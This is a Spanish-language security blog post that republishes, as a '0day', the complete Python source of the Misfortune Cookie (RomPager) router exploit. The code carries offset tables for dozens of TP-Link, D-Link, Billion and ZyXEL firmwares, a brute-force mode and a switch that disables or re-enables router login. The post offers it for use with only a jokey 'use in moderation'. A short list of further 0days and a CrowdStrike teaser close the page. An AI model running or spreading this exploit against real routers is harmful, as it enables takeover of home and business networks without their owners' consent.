viernes, 29 de abril de 2016

0DAY - Misfortune Cookie Router Authentication Bypass




sres, sras, sritas :p

les dejamos un exploit que es llamado:


Misfortune Cookie Router Authentication Bypass

El cual basados en la descripción del creador dice lo siguiente:

 

Misfortune Cookie es una vulnerabilidad critica, la cual le permite a un intruso remotamente tomar el control de un router, el cual es usado ppara atacar redes wifi caseras y de negocio y este tipo de vulnerabilidad tiene que ver con el mal manejo de el protocolo HTTP y las cookies.


CUANTOS ROUTERS WIFI SON AFECTADOS?

 

A la fecha se han detectado aproximadamente 12 millones de dispositivos afectados por esta vulnerabilidad como en México y especialmente en LATINOAMERICA, pero la lista puede crecer..... ;p

 

aquí la lista de routers afectados con este exploit:

 






 

y aquí les dejo el code:


# Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover
# Date: 17/4/2016
# CVE: CVE-2015-9222 (http://mis.fortunecook.ie)
# Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,...
# Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf
# Versions affected: RomPager <= 4.34 (specifically 4.07)
# Tested on : firmwares which are set as tested in the targets list
# Category: Remote Exploit
# Usage: ./exploit.py url
#   Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040
# Author: Milad Doorbash
# Email: milad.doorbash@gmail.com
# Social: @doorbash
# Blog: http://doorbash.ir
# Many Thanks to :
#   Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html)
#   Piotr Bania (http://piotrbania.com/all/articles/tplink_patch)
#   Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf)
#   Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)
# Disclaimer :
#   This exploit is for testing and educational purposes only.Any other usage for this code is not allowed.
#   Author takes no responsibility for any actions with provided informations or codes.
# Description :
#   Misfortune Cookie is a critical vulnerability that allows an intruder to remotely
#   take over an Internet router and use it to attack home and business networks.With a few magic
#   cookies added to your request you bypass any authentication and browse the configuration
#   interface as admin, from any open port.
import requests
import sys
import time
MODE_TEST = 100000
MODE_BRUTE_FORCE = 100001
if len(sys.argv) == 1:
    print "usage: python " + sys.argv[0] + " url [enable]"
    print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040"
    exit()
url = str(sys.argv[1])
auth_byte = '\x00'
s = requests.Session()
if len(sys.argv) == 3:
    if str(sys.argv[2]) == 'enable':
        auth_byte = '\x01' # enable authenticaion again
    else:
        print "usage: python " + sys.argv[0] + " url [enable]"
        exit()
targets = [
    ["Azmoon    AZ-D140W        2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79       # tested
    ["Billion   BiPAC 5102S     Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d                       # ----------
    ["Billion   BiPAC 5102S     Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d                       # ----------
    ["Billion   BiPAC 5200      2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad                  # ----------
    ["Billion   BiPAC 5200      2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5               # ----------
    ["Billion   BiPAC 5200A     2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1                   # ----------
    ["Billion   BiPAC 5200A     2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51                 # ----------
    ["Billion   BiPAC 5200GR4       2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51           # tested
    ["Billion   BiPAC 5200S     2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109                  # ----------
    ["Billion   BiPAC 5200SRD       2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d             # ----------
    ["Billion   BiPAC 5200SRD       2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5           # ----------
    ["D-Link    DSL-2520U   Z1  1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01    # tested
    ["D-Link    DSL-2600U   Z1  DSL-2600U HWZ1",107366496,13], # 0x8040637d                             # ----------
    ["D-Link    DSL-2600U   Z2  V1.08_ras",107360133,20], # 0x803389B0                                  # ----------
    ["TP-Link   TD-8616     V2  TD-8616_v2_080513",107371483,21], # 0x80397055                          # ----------
    ["TP-Link   TD-8816     V4  TD-8816_100528_Russia",107369790,17], # 0x803ae0b1                      # ----------
    ["TP-Link   TD-8816     V4  TD-8816_V4_100524",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8816     V5  TD-8816_100528_Russia",107369790,17], # 0x803ae0b1                      # ----------
    ["TP-Link   TD-8816     V5  TD-8816_V5_100524",107369790,17], # 0x803ae0b1                          # tested
    ["TP-Link   TD-8816     V5  TD-8816_V5_100903",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8816     V6  TD-8816_V6_100907",107371426,17], # 0x803c6e09                          # ----------
    ["TP-Link   TD-8816     V7  TD-8816_V7_111103",107371161,1], # 0x803e1bd5                           # ----------
    ["TP-Link   TD-8816     V7  TD-8816_V7_130204",107370211,5], # 0x80400c85                           # ----------
    ["TP-Link   TD-8817     V5  TD-8817_V5_100524",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8817     V5  TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1                       # ----------
    ["TP-Link   TD-8817     V5  TD-8817_V5_100903",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8817     V6  TD-8817_V6_100907",107369788,1], # 0x803b6e09                           # ----------
    ["TP-Link   TD-8817     V6  TD-8817_V6_101221",107369788,1], # 0x803b6e09                           # ----------
    ["TP-Link   TD-8817     V7  TD-8817_V7_110826",107369522,25], # 0x803d1bd5                          # ----------
    ["TP-Link   TD-8817     V7  TD-8817_V7_130217",107369316,21], # 0x80407625                          # ----------
    ["TP-Link   TD-8817     V7  TD-8817_v7_120509",107369321,9], # 0x803fbcc5                           # tested
    ["TP-Link   TD-8817     V8  TD-8817_V8_140311",107351277,20], # 0x8024E148                          # Grant Willcox
    ["TP-Link   TD-8820     V3  TD-8820_V3_091223",107369768,17], # 0x80397E69                          # Chan
    ["TP-Link   TD-8840T    V1  TD-8840T_080520",107369845,5], # 0x80387055                             # ----------
    ["TP-Link   TD-8840T    V2  TD-8840T_V2_100525",107369790,17], # 0x803ae0b1                         # tested
    ["TP-Link   TD-8840T    V2  TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1                      # ----------
    ["TP-Link   TD-8840T    V2  TD-8840T_v2_090609",107369570,1], # 0x803c65d5                          # ----------
    ["TP-Link   TD-8840T    V3  TD-8840T_V3_101208",107369766,17], #0x803c3e89                          # tested   
    ["TP-Link   TD-8840T    V3  TD-8840T_V3_110221",107369764,5], # 0x803d1a09                          # ----------
    ["TP-Link   TD-8840T    V3  TD-8840T_V3_120531",107369688,17], # 0x803fed35                         # ----------
    ["TP-Link   TD-W8101G   V1  TD-W8101G_090107",107367772,37], # 0x803bf701                           # ----------
    ["TP-Link   TD-W8101G   V1  TD-W8101G_090107",107367808,21], # 0x803e5b6d                           # ----------
    ["TP-Link   TD-W8101G   V2  TD-W8101G_V2_100819",107367751,21], # 0x803dc701                        # ----------
    ["TP-Link   TD-W8101G   V2  TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829                     # ----------
    ["TP-Link   TD-W8101G   V2  TD-W8101G_V2_101101",107367749,13], # 0x803e1829                        # ----------
    ["TP-Link   TD-W8101G   V3  TD-W8101G_V3_110119",107367765,25], # 0x804bb941                        # ----------
    ["TP-Link   TD-W8101G   V3  TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9                        # ----------
    ["TP-Link   TD-W8101G   V3  TD-W8101G_V3_120604",107365835,1], # 0x804f16a9                         # ----------
    ["TP-Link   TD-W8151N   V3  TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4                        # tested
    ["TP-Link   TD-W8901G   V1  TD-W8901G_080522",107367787,21], # 0x803AB30D                           # Piotr Bania
    ["TP-Link   TD-W8901G   V1,2    TD-W8901G_080522",107368013,5], # 0x803AB30D                        # ----------
    ["TP-Link   TD-W8901G   V2  TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D                    # ----------
    ["TP-Link   TD-W8901G   V3  TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335                     # tested
    ["TP-Link   TD-W8901G   V3  TD-W8901G_V3_100603",107367751,21], # 0x803DC701                        # chan
    ["TP-Link   TD-W8901G   V3  TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701                     # tested
    ["TP-Link   TD-W8901G   V3  TD-W8901G_V3_100901",107367749,13], # 0x803E1829                        # tested
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_110119",107367765,25], # 0x804BB941                        # Chan
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9                        # Chan
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_120418",107365835,1], # 0x804F16A9                         # ----------
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9                        # ----------
    ["TP-Link   TD-W8901GB  V3  TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9                       # ----------
    ["TP-Link   TD-W8901GB  V3  TD-W8901GB_V3_100820",107369393,21], # 0x803f1719                       # ----------
    ["TP-Link   TD-W8901N   V1  TD-W8901N v1_111211",107353880,0],  # 0x8034FF94                        # cawan Chui
    ["TP-Link   TD-W8951ND  V1  TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61      # tested
    ["TP-Link   TD-W8951ND  V1  TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9                    # ----------
    ["TP-Link   TD-W8951ND  V1  TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9                       # ----------
    ["TP-Link   TD-W8951ND  V3  TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189                  # ----------
    ["TP-Link   TD-W8951ND  V3  TD-W8951ND_V3_110721",107366743,21], # 0x804ee049                       # ----------
    ["TP-Link   TD-W8951ND  V3  TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189                  # ----------
    ["TP-Link   TD-W8951ND  V4  TD-W8951ND_V4_120511",107364759,25],  # 0x80523979                      # tested
    ["TP-Link   TD-W8951ND  V4  TD-W8951ND_V4_120607",107364759,13], # 0x80524A91                       # tested
    ["TP-Link   TD-W8951ND  V4  TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859                    # tested
    ["TP-Link   TD-W8961NB  V1  TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1                       # tested
    ["TP-Link   TD-W8961NB  V1  TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1                       # ----------
    ["TP-Link   TD-W8961NB  V2  TD-W8961NB_V2_120319",107367629,21], # 0x80531859                       # ----------
    ["TP-Link   TD-W8961NB  V2  TD-W8961NB_V2_120823",107366421,13], # 0x80542e59                       # ----------
    ["TP-Link   TD-W8961ND  V1  TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61                # tested
    ["TP-Link   TD-W8961ND  V1  TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61                    # ----------
    ["TP-Link   TD-W8961ND  V1  TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9                       # ----------
    ["TP-Link   TD-W8961ND  V2  TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9                       # ----------
    ["TP-Link   TD-W8961ND  V2  TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9                    # ----------
    ["TP-Link   TD-W8961ND  V2  TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1                    # ----------
    ["TP-Link   TD-W8961ND  V3  TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4                 # ----------
    ["TP-Link   TD-W8961ND  V3  TD-W8961ND_V3_120830",107353414,36], # 0x803605B4                       # ----------
    ["ZyXEL P-660R-T3   V3  3.40(BOQ.0)C0",107369567,21], # 0x803db071                                  # tested
    ["ZyXEL P-660RU-T3  V3  3.40(BJR.0)C0",107369567,21], # 0x803db071                                  # ----------
     
# *---------- means data for this firmware is obtained from other tested firmwares.
# if you tested on your devices report to me so i can change them to tested state.
# don't forget to mention your device model and full firmware version in your reports.
# I could not gather information for every vulnerable firmwares since some vendors has removed
# vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them.
# if you want to add missing firmwares data to list you can do it by reading blog posts
# mentioned in "Many thanks to" part at the beginning.Btw please don't hesitate to contact me
# for any question or further information.
]
def request(num,n,data):
    try:
        print "\nConnecting to: " + url + "\n"
        s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"})
        r = s.get(url)
        print str(r.status_code) + "\n"
        for i in r.headers:
            print i + ": " + r.headers[i]
        return [r.status_code,r.text]
    except Exception, e:
        return 1000
def printMenu():
    print """
         __  __ _      __            _                   
        |  \/  (_)___ / _| ___  _ __| |_ _   _ _ __   ___
        | |\/| | / __| |_ / _ \| '__| __| | | | '_ \ / _ \         
        | |  | | \__ \  _| (_) | |  | |_| |_| | | | |  __/             
        |_|  |_|_|___/_|  \___/|_|   \__|\__,_|_| |_|\___|         
                                                           
   ____            _    _        _____            _       _ _  
  / ___|___   ___ | | _(_) ___  | ____|_  ___ __ | | ___ (_) |_
 | |   / _ \ / _ \| |/ / |/ _ \ |  _| \ \/ / '_ \| |/ _ \| | __|
 | |__| (_) | (_) |   <| |  __/ | |___ >  <| |_) | | (_) | | |_
  \____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__|
                                           |_|                
----------------------------------------------------------------------------
"""
    for k,i in enumerate(targets):
        print str(k+1) + "- " + i[0]
    print """
0- Not sure just try them all! (may cause reboot)
T- Test misfortune cookie vulnerablity against target
B- BruteForce to find auth-remover cookie (may cause reboot)
"""
    c = 0
    while True:
        selection = raw_input("select a target: ")
        if selection == "T":
            return MODE_TEST
        elif selection == "B":
            return MODE_BRUTE_FORCE
        c = int(selection)
        if c <= len(targets):
            break
        else:
            print "bad input try again"
    return c - 1
def bruteforce():
    for i in range(107364000,107380000):
        for j in range(0,40):
            print "testing " + str(i) + " , " + str(j)
            result = request(i,j,"\x00")[0]
            if result <= 302:
                print "YEAHHH!!!!"
                print str(i) + " , " + str(j) + " is the answer!"
                return
            elif result == 1000:
                time.sleep(60)
def exploit():
    c = printMenu()
    if c < 0:
        for k,i in enumerate(targets):
            print "testing #" + str(k+1) + " ..."
            result = request(i[1],i[2],auth_byte)[0]
            if result == 1000:
                print "\n[!] Error. maybe router crashed by sending wrong cookie or it's your connection problem.waiting 60 seconds for router to reboot"
                time.sleep(60)
            elif result <= 302:
                print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
                break # some routers always return 200 (for custom login page). so maybe we should comment this line
            else:
                print "\n[!] Failed."
    else:
        if c == MODE_TEST:
            if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]:
                print "\n[!] Target is vulnerable"
            else:
                print "\n[!] Target is not vulnerable"
        elif c == MODE_BRUTE_FORCE:
            bruteforce()
        elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302:
            print "\n[!] Failed."
        else:
            print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
exploit()


eof------->

usenlo con moderación :p

 Li. Rodolfo H. Baz

X. CyberSecurity Conferences 

www.x25.org.mx




0Day Nuestro de cada día - 29-04-16





Como siempre amigos aquí les dejo la lista  de 0day que están a mi parecer muy buenos ya que  el que veo mas interesante es el de PHP y que esta catalogado en la sección de:

Empezamos con los que son:

REMOTE EXPLOIT



y después vemos uno interesante que es del tipo:


 POC & Denial of Servide Exploit

y esta dedicado al famoso y bien ponderado WINDOWS.





 PUEs  ahi se los dejo y recuerden usenlos con moderación.

Li. Rodolfo Baz
Centro de Investigaciones en Seguridad Informática
www.ccat.edu.mx

Crowdstrike -> Solución de errores de actualización de CrowdStrike con BitLocker habilitado

En este pequeño articulo ver como componer el problema de CROWDSTRIKE cuando esta habilitado el BITLOCKER, cabe resaltar que puede ser una e...